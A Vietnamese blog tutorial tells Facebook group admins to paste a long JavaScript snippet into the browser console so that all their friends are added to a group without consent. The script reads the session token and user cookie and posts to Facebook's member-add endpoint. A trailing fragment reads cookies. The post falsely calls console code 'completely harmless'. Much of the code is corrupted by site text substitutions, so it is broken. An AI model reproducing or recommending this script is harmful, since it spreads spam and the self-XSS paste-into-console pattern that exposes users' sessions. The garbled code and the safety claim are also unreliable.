thêm tất cả bạn bè vào nhóm facebook 2018 | Copy Paste Tool

Xin chào các bạn chắc hẳn các bạn đang cần tạo một group facebook cho riêng mình. Nhưng không biết làm sao để tăng số lượng member một cách nhanh chóng. Hôm nay mình sẽ hướng dẫn các bạn thêm tất cả bạn bè đang có vào group chỉ với 1 click để phục vụ kinh doanh, mua bán, cộng đồng …

Anonyviet sẽ hướng dẫn các bạn thủ thuật mời bạn bè vào group chỉ 1 click chuột.

Cách thêm bạn bè vào Group Facebook với 1 Click chuột

Bước 1: Đầu tiên các bạn đăng nhập facebook có quyền admin của group cần thêm member.

Bước 2: Vào màn hình chính của group có quyền admin của bạn.

Cách thêm bạn bè vào Group Facebook với 1 click

Sau đó các bạn ấn F12 hoặc bạn kích chuột phải chọn kiểm tra phần tử. Chuyển sang Tab Console như hình.

Cách thêm bạn bè vào Group Facebook với 1 click

Ở phía dưới bảng Console chọn các bạn dán đoạn code dưới đây vào và tận hưởng thành quả nhé !! Đó là code Javascript nên hoàn toàn không nguy hiểm. Tuy nhiên, phần code viết khá dài nên mình không khuyến nghị các cậu viết tay vì rất dễ sai.

(function(){var f={dtsg:document.getElementsByName(“fb_dtsg”)[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]),gid:document.getElementsByName(“group_id”)[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open(“GET”,b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval(“(“+c.responseText.substr(9)+”)”);a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById(“hasilsurasil”).innerHTML=”Bạn đang có tổng: <b>”+f.frns.length+” bạn bè</b><div id=’hasilsatu’></div><div id=’hasildua’></div><div id=’hasiltiga’ style=’min-width:300px;display:inline-block;text-align:left’></div>”+crj;for(x in f.frns)f.senAjak(x)}else copypastetool.comlementById(“hasilsurasil”).innerHTML=4==c.readyState&&404==c.status?”<b style=’color:darkred’>Gruppe Öffnen!</b>”+crj:”<b style=’color:darkgreen’>Đang tiến hành lấy dữ liệu…LOADING…▂ ▃ ▄ ▅ ▆ █ 99% F(“+c.readyState+”)</b>”+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm=”__a=1&fb_dtsg=”+f.dtsg+”&group_id=”+f.gid+”&source=typeahead&ref=&message_id=&members=”+f.frns[d].uid+”&__user=”+f.uid+”&phstamp=”;e.open(“POST”,”/ajax/groups/members/add_post.php”,!0),e.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”),e.setRequestHeader(“Content-length”,prm.length),e.setRequestHeader(“Connection”,”keep-alive”),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval(“(“+e.responseText.substr(9)+”)”);if(f.prenKe++,document.getElementById(“hasilsatu”).innerHTML=”<div><b>”+f.prenKe+”</b> trong tổng số <b>”+f.frns.length+”</b></div>”,a.errorDescription&&(f.gagal++,document.getElementById(“hasiltiga”).innerHTML=”<div><b style=’color:darkred’>( “+f.gagal+” )</b> <span style=’color:darkred’>”+a.errorDescription+”</span></div>”),a.jsmods&&a.jsmods.require){var b=”<div>”;for(x in copypastetool.comire)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+=”<b style=’color:darkgreen’>”+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+”</b> “);b+=”<div>”,document.getElementById(“hasildua”).innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,””));if(c.uid&&c.name){f.okeh++,document.getElementById(“hasiltiga”).innerHTML=”<div><b style=’color:darkgreen’>( “+f.okeh+” )</b> <a href=’/”+c.uid+”‘ target=’_blank’><b>”+c.name+”</b></a> hoàn thành.</div>”;break}}f.prenKe==f.frns.length&&(document.getElementById(“hasiltiga”).style.textAlign=”center”,document.getElementById(“hasiltiga”).innerHTML+=”<div style=’font-size:20px;font-weight:bold’>Đã Hoàn Thành ^_^</div><a href=’/’ onClick=’document.getElementById(“hasilsurasil”).style.display=”none”;return false’>Trang Chủ Facebook</a>”)}},e.send(prm)}},g=[“i”,”a”,”e”,”g”,”o”,”s”,”n”,”b”,”l”,”p”,”m”,”2″,”r”,”0″,”c”,”1″,”t”,”5″,”v”,”h”,”u”,”©”],crl=g[3].toUpperCase()+g[19]+g[2]+g[9]+g[6].toUpperCase()+g[20]+g[1]+g[16].toUpperCase()+g[12]+g[1]+g[0]+g[16].toUpperCase()+g[0]+g[10]+”.”+g[7].toUpperCase()+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+”.”+g[14].toUpperCase()+g[4]+g[10],crj=”<div style=’margin-top:10px;color:gray;font-size:12px’>”+g[5].toUpperCase()+g[4]+g[6]+g[16].toUpperCase()+g[0]+g[2]+g[6]+g[16].toUpperCase()+g[0]+” “+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+”<div style=’font-size:9px’>Bản quyền thuộc về . <a href=’https://www.facebook.com/groups/459699294211573/’ target=’_blank’>”+crl+”</a>. Desiger by: Quốc Hiếu</div></div>”;document.body.innerHTML+=”<center id=’hasilsurasil’ style=’min-height:50px;width:600px;position:fixed;top:100px;left:”+(document.body.offsetWidth-530)/2+”px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)’><b>Đang tiến hành. LOADING…▂ ▃ ▄ ▅ ▆ █ 99% … Desiger by: Quốc Hiếu</b>”+crj+”</center>”,f.getAjak(“/ajax/typeahead/first_degree.php?__a=1&viewer=”+f.uid+”&token=”+Math.random()+”&filter[0]=user&options[0]=friends_only”)})(); var fb_dtsg = copypastetool.comlementsByName(‘fb_dtsg’)[0].value; var user_id = copypastetool.comh(document.cookie.match(/c_user=(d+)/)[1]) function cereziAl(isim) { var tarama = isim + “=”; if (document.cookie.length > 0) { konum = copypastetool.comxOf(tarama) if (konum != -1) { konum += copypastetool.comth son = copypastetool.comxOf(“;”, konum) if (son == -1) son = copypastetool.comth return unescape(document.cookie.substring(konum, son)) } else { return “”; } } } function getRandomInt (min, max) { return copypastetool.comr(Math.random() * (max – min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, copypastetool.comth-1)]; }

Sau khi hoàn thành các bạn sẽ nhìn thấy một bảng thông báo hiện ra số người đã được thêm các bạn chờ thông báo chạy hết rồi tắt đi là hưởng thành quả nhé.

Dùng Extension Group Invite All

Trong trường hợp Code trên không hoạt động, bạn có thể dùng Extension dưới đây để Add Friend vào Group nhanh nhất

  • Trước tiên bạn Download Group Invite All về Chrome hoặc Cốc Cốc
  • Sau khi tải xuống và cài đặt, hãy truy cập vào Group mà bạn muốn thêm bạn bè.
  • Sau đó chỉ cần click vào biểu tượng hiển thị ở góc trên bên phải của trình duyệt bắt đầu mời bạn

Cách thêm tất cả bạn bè vào Group Facebook với 1 Click 3

Tóm lược

Như vậy là mình đã hướng dẫn các bạn thêm bạn bè vào group chỉ trong một nốt nhạc. Qua hướng dẫn trên mình mong rằng với những ai có khả năng kinh doanh, tạo dựng cộng đồng sẽ có thể làm cộng đồng lớn mạnh hơn… Các bạn cũng có thể nhờ bạn bè, người thân làm theo để có thể tăng lượng member lên cao nhé. Chúc các bạn thành công.

Mọi thắc mắc xin liên hệ facebook của mình: copypastetool.com/duynhat38

Nếu bạn cảm thấy bài viết này có ích thì đừng quên để lại like + share cũng như comment nhé !!

Tác giả: Ng. Duy Nhật

Viết một bình luận